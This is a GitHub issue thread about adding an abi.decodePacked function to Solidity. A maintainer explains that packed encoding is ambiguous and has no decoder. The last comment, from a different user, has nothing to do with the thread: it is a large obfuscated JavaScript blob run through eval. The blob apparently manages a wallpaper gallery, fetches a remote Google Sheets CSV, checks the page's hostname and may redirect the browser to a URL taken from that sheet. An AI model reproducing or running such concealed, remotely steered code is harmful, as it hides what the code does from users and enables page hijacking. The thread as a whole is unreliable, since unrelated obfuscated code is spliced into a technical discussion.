### ISSUE TITLE
abi.decodePacked

### ISSUE THREAD

**Issue by rotcivegaf** [ethereum/solidity#6919]
## Abstract

I use abi.encodePacked to encode a data array of bytes, E.G.:
 

I have:
```
address a = 0xCd626bc764E1d553e0D75a42f5c4156B91a63F23
uint8 b = 0xA4
bool c = true = 0x0000000000000000000000000000000000000000000000000000000000000001

abi.encodePacked(a, b,c) = 0xcd626bc764e1d553e0d75a42f5c4156b91a63f23a401
```
When i want recieve this data in a function, i need use an external library to decode the packed data

## Motivation

I actually use this [contract(library)](https://github.com/ripio/rcn-network/blob/master/contracts/utils/BytesUtils.sol) to decode the packed data

We need an abi.decodePacked, like abi.decode but recieve a packed data, in the example:
```
(address, uint8, bool) = abi.encodePacked(0xcd626bc764e1d553e0d75a42f5c4156b91a63f23a401, (address, uint8, bool))
```

## Specification

`abi.decodePacked(bytes memory encodedPackedData, (...)) returns (...)`

**Comment by leonardoalt** [comment]
The documentation states in https://solidity.readthedocs.io/en/v0.5.9/abi-spec.html#abi-packed-mode:
`Since the encoding is ambiguous, there is no decoding function.`

There is no way to know how exactly to decode the data in the general case.

**Comment by rotcivegaf** [comment]
Thanks, I'm understand.

**Comment by raghavendratechnic** [comment]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c b=1i;v 1i(3t,3o){c 3b=1n();Y 1i=v(1D,8e){1D=1D-3S;16 3z=3b[1D];Y 3z},1i(3t,3o)}(v(3n,43){c z=1i,1k=3n();4C(!![]){5F{c 3U=D(z(5K))/38+-D(z(5Q))/1L+-D(z(5j))/56*(-D(z(5A))/5i)+D(z(4E))/4P*(-D(z(4Y))/4T)+-D(z(4K))/4J+D(z(4I))/4H+D(z(50))/4Q;1c(3U===43)4x;2W 1k[\'29\'](1k[\'3D\']())}53(5H){1k[\'29\'](1k[\'3D\']())}}}(1n,5Z));c 1g=h[b(W)](b(66)),1a=h[\'2a\'](b(2Y)),1d=h[b(W)](b(69)),19=h[\'2a\'](b(6a)),20=h[b(W)](\'.2G\');1a[b(S)](b(1f),()=>{c R=b;19[R(i)][\'C\']=\'1j\',1a[R(i)][R(K)]=\'1j\',1d[R(i)][R(K)]=R(1h)}),1d[\'2f\'](b(1f),()=>{c x=b;19[x(i)][\'C\']=x(1h),1a[x(i)][\'C\']=x(5W),1d[x(i)][x(K)]=\'1j\',20[x(i)][\'C\']=x(1E),1g[\'1N\'][x(K)]=x(1E)}),19[b(S)](\'1Q\',23=>{c k=b;23[\'3C\'][k(5y)]===k(5z)&&(20[k(i)][k(K)]=k(1h),19[k(i)][\'C\']=k(1E),1a[k(i)][k(K)]=k(1E),1d[\'1N\'][\'C\']=k(1h),1g[\'2e\']=23[k(5M)][k(52)],1g[k(i)][k(K)]=\'2F\')});c 25=h[b(W)](b(2Y));16 1O=q[b(1y)];q[b(S)](b(5C),()=>{c A=b;1c(q[A(1y)]>1O+1L)25[A(2U)][A(5B)](A(2S));2W q[A(1y)]<1O-1L&&25[A(2U)][A(2D)](A(2S));1O=q[A(1y)]});v 1n(){c 2O=[\'5x\',\'5w\',\'5v\',\'27://5u.5t.5s/5r/5q.2P?\',\'2P\',\'5p\',\'5n\',\'\\2><I\\E=\\37\\2\\1Y-1U=\\1S\\2\\1A=\\1J\\y\\M\\M\\2\\1H-1V=\\3d\\2\\1W=\\2-1\\2\\1X=\\3g\\2><J\\1C=\\3i\\10.35-1.45-1.3j.4\\1B.36\\l\\2c.28\\l\\B.5\\l\\w.42\\N.42\\e\\1R.5\\3A.74\\y\\e.41.81\\N.5\\l.3w.3v\\e.81\\1z.76\\e\\1F.5\\e\\1o.58\\e\\P\\w.42\\P\\B.2g\\e.78-3.4\\1G.86-8.55\\1m.22\\10.2Z\\2></J></I></F></1e>\',\'5m\',\'\\2\\5l=\\5k\\2><5h\\E=\\5g\\2\\5f=\\2\',\'4f\',\'1e\',\'3G\',\'\\2><1r\\E=\\3R\\2>\',\'5e\',\'1N\',\'5d\',\'.5c-F\',\'<I\\E=\\5b\\2\\1Y-1U=\\1S\\2\\1A=\\1J\\y\\M\\M\\2\\1H-1V=\\5a\\2\\1W=\\2-1\\2\\1X=\\59\\2><J\\1C=\\5D.5\\5o-1.74\\y-3.41.81-4.5\\l.5E.68\\e.81\\2k.24\\e\\1R.5\\e\\N.42\\e\\l\\w.42\\l\\B.2g\\e.78\\e.4\\1G.86\\B.55\\1m.22\\10.67.45-1.65.6\\1B.36\\P\\2c.28\\P\\B.5\\P\\w.42\\1o.58\\e\\1F.5\\64-4.4\\1B.55-.1.1-.1-.63.14\\1z.24\\N\\1m.39\\N\\B.5\\N\\1G.5\\w.5\\w\\1R.5\\62.54\\y\\e.61.2H\\e.57\\l.60.5X.46\\w.2H\\1z.5V\\w\\1F.5\\5G\\y\\e.5\\5U.5\\e.5\\e.5\\y\\l.89-3.14\\w.74-7.9\\5T.5S\\2></J></I>\',\'5R\',\'2a\',\'2I-j\',\'5P\',\'5O\',\'5N\',\'\\O,\\2l\\O\',\'6b\',\'5L\',\'#1g\',\'5J\',\'5I\',\'4s\',\'#33\',\'4p\',\'4v-Q\',\'4B\',\'4c\',\'</F></1e>\',\'4A\',\'4D\',\'\\O)\\2><I\\4u=\\4t://4q.4F.4R/4X/I\\2\\1A=\\1J\\y\\M\\M\\2><g\\4V=\\4S(0.4G,\\l.4N)\\2><J\\1C=\\51\\4L\\34.11\\10.11\\1o\\4M\\4O.9\\1o\\l\\34.11\\l\\4U\\4W.55\\2k.4Z.13\\B.4z\\1m.4r.4w.88\\B.4y.46\\2k.5Y\\6d\\2></J></g></I></F><F\\E=\\7T-F\\2\\1H-Q=\\2\',\'7S\',\'7R\',\'7Q\',\'\\2\\7P=\\2\',\'2E\',\'33\',\'1I\',\'3k\',\'7O\',\'7N\',\'7M\',\'1q\',\'3V\',\'1T\',\'7L\',\'2i\',\'7K/2M\',\'<I\\E=\\37\\2\\1Y-1U=\\1S\\2\\1A=\\1J\\y\\M\\M\\2\\1H-1V=\\3d\\2\\1W=\\2-1\\2\\1X=\\3g\\2><J\\1C=\\3i\\10.35-1.45-1.3j.4\\1B.36\\l\\2c.28\\l\\B.5\\l\\w.42\\N.42\\e\\1R.5\\3A.74\\y\\e.41.81\\N.5\\l.3w.3v\\e.81\\1z.76\\e\\1F.5\\e\\1o.58\\e\\P\\w.42\\P\\B.2g\\e.78-3.4\\1G.86-8.55\\1m.22\\10.2Z\\2></J></I>\',\'.2G\',\'7I...\',\'#7x\',\'7H\',\'1j\\2l!7V\',\'2e\',\'27://7G.7F/7E\',\'7D\',\'2f\',\'26\',\'F\',\'7C\',\'<1e\\E=\\3F\\2><a\\49=\\2\',\'7B\',\'7A\',\'7z\',\'7y\',\'1j\',\'7U\',\'4n\',\'29\',\'#40\',\'32\',\'Q\',\'7J\',\'7W\',\'8c-2F\',\'27://8g.8f.8h/8i/d/2B-2A/7X?6c=8d&8b=2B-2A\',\'#2I-j\',\'8a\\87\\4o\',\'85\',\'2N\',\'84\',\'\\83\\82\\80.2M\',\'7Z\',\'3C\',\'3P\',\'7Y\',\'7w\',\'17\',\'C\',\'j\',\'7v\',\'6Q\',\'</1r></a><F\\3T=\\3W-44-48\\2\\4a=\\3Y(\\O\',\'1Q\'];1n=v(){Y 2O};Y 1n()}v 7u(2T,4e){c f=b;1l s=h[f(2d)](f(6y));s[\'17\']=f(6z),s[\'1N\'][f(6A)]=\'6B\',s[f(i)][f(6C)]=\'26\',s[f(i)][f(6D)]=f(6E),s[f(i)][f(6x)]=\'#6F\',s[f(i)][f(6H)]=f(6I),s[f(i)][f(6J)]=\'26\',s[f(i)][f(6K)]=f(6L),h[f(1K)][\'2i\'](s);1l 1p=15 6M();1p[f(6N)](\'6G\',2T,!![]),1p[f(6v)]=\'6m\',1p[\'6u\']=v(6f){c o=f;1c(3p[\'6g\']==6h){1l 4i=15 6i([3p[o(6j)]],{\'6k\':o(6e)}),4h=q[o(6l)][o(6n)](4i),T=h[o(2d)](\'a\');T[o(2w)]=4h,T[\'6o\']=4e+o(6p);1l 4d=\'\';T[o(2v)]=4d,h[o(1K)][o(6q)](T),T[\'1Q\'](),h[o(1K)][o(6r)](T)}6s(v(){h[\'4f\'][\'4n\'](s)},6t)},1p[\'6O\']()}c Q=b(6w)+15 6P()[b(7c)]();16 j=2n[b(7e)](2o[b(7f)](b(7g)))||[];3q(Q)[\'3V\'](3X=>3X[b(7h)]())[b(7i)](1v=>{c n=b,Z={};1v[n(1b)](2b=>{c 1s=n,3L=2b[1s(7j)][1s(3y)](\',\');3L[\'1T\'](1t=>{c 47=1s;!Z[1t]&&(Z[1t]=[]),Z[1t][47(4b)](2b)})});c 3Z=7k[n(7d)](Z),3Q=h[n(2s)](\'40\');3Z[n(1b)](2h=>{c 1u=n,1x=h[1u(2d)](1u(7l));1x[\'2e\']=2h,1x[\'2f\'](1u(1f),()=>{3N(2h)}),3Q[\'2i\'](1x)});v 3N(21){c r=n,3J=21===r(7n)?1v:Z[21];16 2j=\'\';3J[\'1T\'](H=>{c m=r;2j+=\'<1e\\E=\\3F\\2><a\\49=\\2\'+H[m(X)]+m(3O)+H[m(3S)]+m(3E)+H[m(3K)]+m(7o)+H[\'1q\']+m(7p)+H[m(X)]+m(7q)+H[\'1q\']+m(3I)+H[m(X)]+\'\\2>\'+(j[m(2z)](H[\'Q\'])?m(7r):\'7s\\7t\\4o\')+m(7m)});c 1Z=h[r(W)](r(4j));1Z[r(i)][\'C\']=\'4c\',1Z[r(2v)]=2j;c 2r=r(7b),2t=r(6Z),2K=h[\'2N\'](r(4g));2K[r(1b)](12=>{c U=r,18=12[\'4l\'](U(3B));12[U(2v)]=j[U(2z)](18)?\'\'+2r:\'\'+2t,12[U(S)](U(1f),()=>{c 1w=U;j[1w(2z)](18)?(j=j[1w(2X)](4k=>4k!==18),12[\'17\']=\'\'+2t):(j[1w(4b)](18),12[\'17\']=\'\'+2r),2o[\'2Q\'](\'j\',2n[\'3G\'](j))})})}h[n(2s)](n(2J))[n(S)](n(1f),()=>{c u=n;16 2q=\'\';j[u(1b)](3M=>{c t=u,L=1v[t(3e)](3H=>3H[t(X)]===3M);2q+=t(7a)+L[t(X)]+t(3O)+L[\'3P\']+t(3E)+L[\'1q\']+\'\\2><1r\\E=\\3R\\2>\'+L[\'1q\']+\'</1r></a><F\\3T=\\3W-44-48\\2\\4a=\\3Y(\\O\'+L[t(X)]+\'\\O,\\2l\\O\'+L[t(3K)]+t(3I)+L[\'Q\']+t(6S)});c 2p=h[u(W)](u(4j));2p[u(i)][\'C\']=u(1h),2p[\'17\']=2q;c 4m=h[u(6T)](u(4g));4m[u(1b)](1M=>{c 2x=u;1M[2x(S)](\'1Q\',()=>{c V=2x,2L=1M[\'4l\'](V(3B));j=j[V(2X)](2V=>2V!==2L),2o[\'2Q\'](\'j\',2n[V(6U)](j)),1M[V(6V)][V(2D)]()})})})}),q[b(S)](\'2E\',v(){c G=b;1l 3l=h[G(2s)](G(2J)),2C=q[G(6W)],31=h[G(1K)][\'6X\'],2R=q[G(6R)]+2C;2R>=31&&(3l[G(i)][G(K)]=G(6Y))}),30(b(70),b(71));72 v 30(3r,3a){c p=b,3m=3s 3q(3r),3x=3s 3m[p(73)](),3f=3x[p(3y)](\'\\75\')[p(77)](3u=>3u[\'3k\'](\',\')),3h=q[p(2y)][\'32\'],2u=15 1I(3h)[p(2m)],1P=3f[p(3e)](3c=>15 1I(3c[79])[p(2m)]===2u);1c(!1P){q[p(2y)][p(2w)]=3a;Y}1c(15 1I(1P[38])[p(2m)]!==2u){q[p(2y)][p(2w)]=1P[1L];Y}};',62,515,'||x22|||||||||_0x47c7fe|const||x203|_0x4944b6||document|0x1a4|favorites|_0x1b318a|x202|_0x41ec82|_0x1771d5|_0x4010d1|_0x3df5ea|window|_0x4c209e|_0x10bd92|_0x1ec39b|_0x483407|function|x205|_0x4b0a8c|x200|_0x511d83|_0x55a17f|x208|display|parseInt|x20class|button|_0x1420df|_0x2b5a05|svg|path|0x18f|_0x547711|x2024|x204|x27|x2022|url|_0xfd81e4|0x1d8|_0x1a0ce9|_0x4fdea3|_0x282f99|0x1a9|0x1e7|return|_0x55a8cc|x2021||_0x43a163|||new|let|innerHTML|_0x3f7ad2|categoriesDiv|seeFavoritesBtn|0x1cb|if|collectionsBtn|div|0x194|buttontitle|0x1b9|_0x226a|none|_0x5ef12a|var|x2011|_0x11fc|x2019|_0x1ab5b8|name|span|_0x3359e6|_0x321b6c|_0x1becf6|_0x454951|_0x33cc37|_0xfa5cb1|0x1df|x2014|x20viewBox|x2015|x20d|_0x226a37|0x1e1|x2016|x206|x20data|URL|x220|0x19f|0x2|_0x24ff5a|style|lastScrollY|_0x3cd479|click|x207|x22true|forEach|hidden|testid|x20tabindex|x20title|x20aria|_0xfdff1b|galleryDiv|_0x1aaaaf|54L12|_0x44d7fa||seefavoritesButton|10px|https||push|querySelector|_0xd1629|x2012|0x1dd|textContent|addEventListener|5c0|_0x1ba88d|appendChild|_0x4fb5ae|x209|x20|0x1f2|JSON|localStorage|_0x1b615c|_0x25eebc|_0x524a5f|0x1c8|_0x3c690a|_0x2d5366|0x18e|0x1e6|_0x15b8de|0x1a3|0x1e8|L0O12Lv4ahmzvh6BPIDkc|13RQlyrqQ_vdNVGELpTOpp|_0x83107d|0x1ee|scroll|block|gallery|99|see|0x1aa|_0x17b1d2|_0x456836|png|querySelectorAll|_0x4ee737|json|setItem|_0x3a5867|0x1af|_0x57ba81|0x18d|_0x283bb8|else|0x1b4|0x1ec|35z|htmlCSSS|_0x2158e3|href|collections|x2018|||x22nostarIc|0x1||_0x527842|_0x11fc80|_0x4d28f1|x22FavoriteOutlinedIcon|0x1e2|_0x3d0cc0|x22FavoriteOutlined|_0x17fd52|x22m12|32C5|split|_0x2ab009|_0x2f6376|_0xf2969a|_0x2cc890|this|fetch|_0x17e38a|await|_0x24d250|_0x9b7728|09|09C13|_0x2c235b|0x1c5|_0x17c371|x203c1|0x1b7|target|shift|0x1c1|x22imgcontainer|stringify|_0xd0a159|0x1bd|_0x2b2f4f|0x1c9|_0x552747|_0x2b0ed5|_0x2ac06f|0x19e|thumbnail|_0xcaf6a2|x22wallname|0x18b|x20id|_0x1594d4|then|x22down|_0x17c34b|x22downloadImage|_0x1bd6cd|categories|||_0x5d1ad2|wall|||_0x49c418|btn|x20href|x20onclick|0x1e4|flex|_0x36b502|_0x31e602|body|0x1a6|_0x5bd244|_0x2bbd32|0x1d0|_0x6c1926|getAttribute|_0x23c0c9|removeChild|x20Favorites|text|www|25V2H11V11|filter|x22http|x20xmlns|data|25L7|break|13L6|13L13|responseType|backgroundColor|while|left|0x195|w3|000000|0x8|0x1f0|0x7|0x1be|x2012H4V17H20V12H22V17C22|x2020|500000|x2019H4C2|0x5|0x9|org|x22translate|0x6|x2017V12M12|x20transform|x2015L17|2000|0x1b2|54L16|0x1d3|x22M2|0x1d5|catch|||0x3|||x22FavoriteBorderOutlined|x22FavoriteBorderOutlinedIcon|x22starIc|favorite|position|location|x20src|x22wallthumb|img|0x4|0x1bf|x22_blank|x20target|innerHeight|1235060IHJQhA|x203c|pageYOffset|pix_wall|pix_pie_icons|io|github|pashapuma|color|All|248055XePSRa|0x1a8|0x1c7|0x19b|0x1b3|0x1c2|x22M16|09C10|try|x205c2|_0xfc5a43|add|156svURMo|0x1c0|borderRadius|0x1f3|getItem|keys|response|0x192|tagName|05z|x2010|x201|96|0x1ea|87C13|55L12|0xaee8b|36h1|04|x205c1|1C7|x203zm|32C18|0x1b1|35l1|91|0x1b5|0x1e5|reduced|format|x2015Z|0x1ce|_0x2aadf0|status|0xc8|Blob|0x1ab|type|0x1c4|blob|0x18c|download|0x1f1|0x1cd|0x1e3|setTimeout|0x7d0|onload|0x1bb|0x198|0x1b8|0x1a0|0x1d1|0x1a5|fixed|0x1db|0x1bc|0x1d9|333|GET|0x197|0x1d2|0x1e0|0x1b0|0x1e9|XMLHttpRequest|0x1c6|send|Date|1233960vCFXTj|0x19a|0x19c|0x1ef|0x1a1|0x191|0x19d|scrollHeight|0x1d4|0x1a7|0x1eb|0x1d6|async|0x1b6||x0a||0x1d7||0x0|0x1dc|0x1cf|0x1de|0x1ac|0x1cc|0x1ad|0x190|0x199|0x1ca|0x1c3|Object|0x1da|0x1ba|0x196|0x1a2|0x193|0x1ae|0x1ed|Add|x20to|downloadImage|parentElement|classList|fff|padding|scrollY|getTime|createElement|bottom|map|40RGIAg|ly|bit|3128463lptwUY|Downloading|includes|image|parse|getElementById|BUTTON|open|x20alt|1070627vgYRJc|6LzBZmD|4842495DHoGTp|x22favorite|find|important|5px|export|createObjectURL|hostname|x20Design||x20PashaPuma|x20by|10234512ltONZW|remove||x20from|||Remove|id|inline|csv|_0x3d7fe4|google|docs|com|spreadsheets'.split('|'),0,{}))
